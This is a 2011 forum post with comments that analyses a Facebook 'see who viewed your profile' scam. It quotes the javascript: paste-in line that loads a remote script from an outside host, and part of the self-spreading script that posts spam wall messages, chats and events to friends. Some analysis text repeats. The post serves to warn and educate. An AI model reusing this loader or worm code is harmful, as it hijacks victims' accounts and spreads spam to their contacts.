See who viewed your Facebook profile - Scam!
For the last couple days some sort of malware infected a number of my friends' Facebook accounts. I got hundreds of Event Invitations, chats and messages about a new app which is claimed to able to help you to view your Profile visitors. All these messages had a url-shortened link to a malware site.
Click to enlarge
Now, this is my theory on how this might be spreading spreading (btw. I never clicked on that link). When a Facebook user click on that url it will trigger a javascript from an external url.
Possibility 1: That JS would run in context with facebook.com, hence got access to your cookies and post the messages/chats etc.
Possibility 2: That JS would interact with the other browser Window/tab where facebook is open and inject the message in user's context.
I believe the second one is the more likely candidate.
Update:-
Today I decided to check one of those URLs in a sandboxed Google Chrome. Well, it is not that sophisticated as I'd hoped!
Click to enlarge
The page apparently asks the user to copy-paste the following javascript code to the browser address bar and click go.
The source from that php file is this:
See how the "Profile visit count" is generated using random numbers!!!
But even with such a lame trick the authors of this scam managed to infect a large number of Facebook users (from IT Project Managers to school children. 
).
The current version of the script produces wall posts like the one shown below:
Click to enlarge
Click to enlarge
Now, this is my theory on how this might be spreading spreading (btw. I never clicked on that link). When a Facebook user click on that url it will trigger a javascript from an external url.
Possibility 1: That JS would run in context with facebook.com, hence got access to your cookies and post the messages/chats etc.
Possibility 2: That JS would interact with the other browser Window/tab where facebook is open and inject the message in user's context.
I believe the second one is the more likely candidate.
Update:-
Today I decided to check one of those URLs in a sandboxed Google Chrome. Well, it is not that sophisticated as I'd hoped!
Click to enlarge
The page apparently asks the user to copy-paste the following javascript code to the browser address bar and click go.
Code:
javascript:(a=(b=document).createElement('script')).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
Code:
var randomnumber=Math.floor(Math.random()*99999); var randomnumber1=Math.floor(Math.random()*987); var randomnumber2=Math.floor(Math.random()*754); var randomnumber3=Math.floor(Math.random()*43); var randomnumber4=Math.floor(Math.random()*9); var random=Math.floor(Math.random()*5); if (random == 1) { var url = 'http://super-kewl.appspot.com/?' } else if (random == 2) { var url = 'http://wonder-land.appspot.com/?' } else if (random == 3) { var url = 'http://go-see.appspot.com/?' } else if (random == 4) { var url = 'http://you-rockz.appspot.com/?' } else { var url = 'http://must-click.appspot.com/?' } var message = '%firstname% See who views your profile '; var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A '; var test = 'My Top Profile Viewers Are:\x0A'; var id = '%tf% - ' + randomnumber1 + ' views,\x0A'; var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A'; var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A'; var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A'; var post = ' see who viewed your facebook profile @ '; var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber; var chatmessage = message + url + randomnumber; var redirect = 'http://downl0adgames.blogspot.com/'; var eventdesc = ev + url + randomnumber; var eventname = 'new facebook feature :o'; var nfriends = 5000; //
Code:
randomnumber3=Math.floor(Math.random()*43);
).The current version of the script produces wall posts like the one shown below:
Click to enlarge
Other versions create Events, Chats and Messages to the user's friends. It is a shame that Facebook failed to block those urls (btw. all of them are created in Google Appengine). I encourage all users seeing such messages to report them as Spam.
Total Comments 3
Comments
-
[B][/B] Mr. strider..Thanks for such a wonderful knowledge sharing post..we Owe you for this ..Thanks...check this out..for some more knowledge regarding the same link:
[url=http://www.youtube.com/watch?v=ThSjD5qKq4g]YouTube - How to see who viewed your profile-BEWARE-FACEBOOKSCAM.wmv[/url]Posted 24-04-2011 at 02:50 PM by WebJockey
-
Some people are kinda dumb...
Never click a shortened URL unless you lengthen it (there are services to do that) Preview Short URLs | Lengthen ShortURLs so You Know where Your Going | ExpandMyURL.com Preventing Nasty Link Surprises for example.
If the site you are going to is not anything like the one you think it is, then don't click on it. If it is suspicious, google it along with keywords FACEBOOK and SCAM. And it's always best to be safe.Posted 25-04-2011 at 09:19 AM by maxmanrules
-
Awesome
This has been out for a while. It is great that someone is whiling to spread the news. I just copied this post url to my facebook wall. Some people on my list are naive about the scams also app that contain malware on facebook.Posted 03-05-2011 at 07:11 PM by shawnpb
